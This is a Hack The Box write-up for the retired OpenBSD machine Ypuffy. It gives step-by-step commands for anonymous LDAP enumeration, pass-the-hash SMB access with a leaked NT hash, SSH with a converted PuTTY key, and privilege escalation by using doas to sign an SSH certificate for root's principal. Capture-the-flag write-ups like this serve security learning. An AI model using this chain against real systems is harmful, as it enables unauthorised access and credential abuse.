# Hack The Box - Ypuffy

## Quick Summary

Hey guys today Ypuffy retired and this is my write-up. This box is a little different from the other boxes. It’s not windows or linux , it’s running openbsd which is a unix-like system. I really liked the privilege escalation in this box because it had some cool ssh stuff. Without talking too much let’s jump right in. It’s a medium difficulty box and its ip is 10.10.10.107 , i added it in /etc/hosts as ypuffy.htb

## Nmap

nmap -sV -sT -sC ypuffy.htb

Nmap tells us that there’s ssh running on port 22 , http on port 80 , smb on port 139 and 445 , ldap on port 389
It also tells us that we can connect anonymously to ldap.

## Initial Enumeration

Let’s check http first

Connection reset. http will be useful later but not now.
Moving on to the next thing , we have smb. Let’s see if we can do a null authentication and enumerate the shares. We will use smbmap
smbmap -H ypuffy.htb

Let’s check ldap

## LDAP

nmap told us that anonymous authentication was allowed so we will use a tool called ldapsearch
ldapsearch -h 10.10.10.107 -p 389 -x -b dc=hackthebox,dc=htb
Full Output :

we can also use nmap to enumerate ldap , with a script called ldap-search
nmap -p 389 --script ldap-search ypuffy.htb
Full Output:

The most interesting part is this :

We get a username alice1978 and an smb NT hash 0B186E661BBDBDCF6047784DE8B9FD8B
This hash is uncrackable however we can still use it to authenticate.

## SMB Enumeration

We need to list the shares first to know where we can connect. We can use a tool called crackmapexec :
crackmapexec ypuffy.htb -u alice1978 -H 0B186E661BBDBDCF6047784DE8B9FD8B --shares

There are only two shares alice and IPC$ , we have read and write permissions to alice and no access to IPC$
We can also use smbclient to list the shares :
smbclient -U alice1978%0B186E661BBDBDCF6047784DE8B9FD8B --pw-nt-hash -L //ypuffy.htb/

But it doesn’t tell us which shares do we have access to and which we don’t.
So we know that we can access the share alice , let’s connect.
smbclient -U alice1978%0B186E661BBDBDCF6047784DE8B9FD8B --pw-nt-hash //ypuffy.htb/alice

There’s only one file called my_private_key.ppk , get my_private_key.ppk to download it.

## SSH and getting user

my_private_key.ppk is a putty private key , we need to convert that to an ssh private key to be able to ssh with it.
On kali I had to get putty-tools first
apt-get install putty-tools
Then we will use puttygen :
puttygen my_private_key.ppk -O private-openssh -o alice.key
Now let’s take a look at the key :

Last step is to chmod 600 alice.key and finally ssh
ssh -i alice.key alice1978@ypuffy.htb

And we owned user !

## More Enumeration

Remember http ? we got a connection reset. Let’s check /etc/httpd.conf

We see two interesting things , location "/userca*" and location "/sshauth*"
After some more enumeration , there are 3 users on the box

alice1978 , bob8791 and userca
bob8791 has a directory called dba

Inside it there’s an sql file called sshauth.sql

It creates a table called principals and another table called keys
If we also check sshd_config in /etc/ssh/

This part :

So that http service is responsible for some ssh authentication stuff , and we can request keys from /sshauth?type=keys&username= and principals from /sshauth?type=principals&username= , requesting keys for root gives us no response , but requesting the principal we get 3m3rgencyB4ckd00r

## Generating and signing ssh keys , Getting root

So now we have root’s principal 3m3rgencyB4ckd00r. Theoretically we can generate ssh keys and sign them with root’s principal , and we will be able to ssh as root with them.
The problem is , as alice1978 we are not authorized to do this. On linux we could check if we can run elevated commands with sudo -l but here there’s no sudo , instead of that there’s a command called doas , if we check the config file for it :

We can run ssh-keygen as userca without password.
First step is to create ssh keys for alice1978
ssh-keygen -t rsa -f /tmp/id_rsa

Then we need the certificate (ca) in /home/userca/ so we will cd there

And sign the ssh keys we have just created as root
doas -u userca /usr/bin/ssh-keygen -s ca -I root -n 3m3rgencyB4ckd00r /tmp/id_rsa

doas -u userca /usr/bin/ssh-keygen -s ca -I root -n 3m3rgencyB4ckd00r /tmp/id_rsa.pub

-s for certificate , -I for identity and -n for principal
Finally we will ssh as root :
ssh -i /tmp/id_rsa root@localhost

And we owned root !

That’s it , Feedback is appreciated !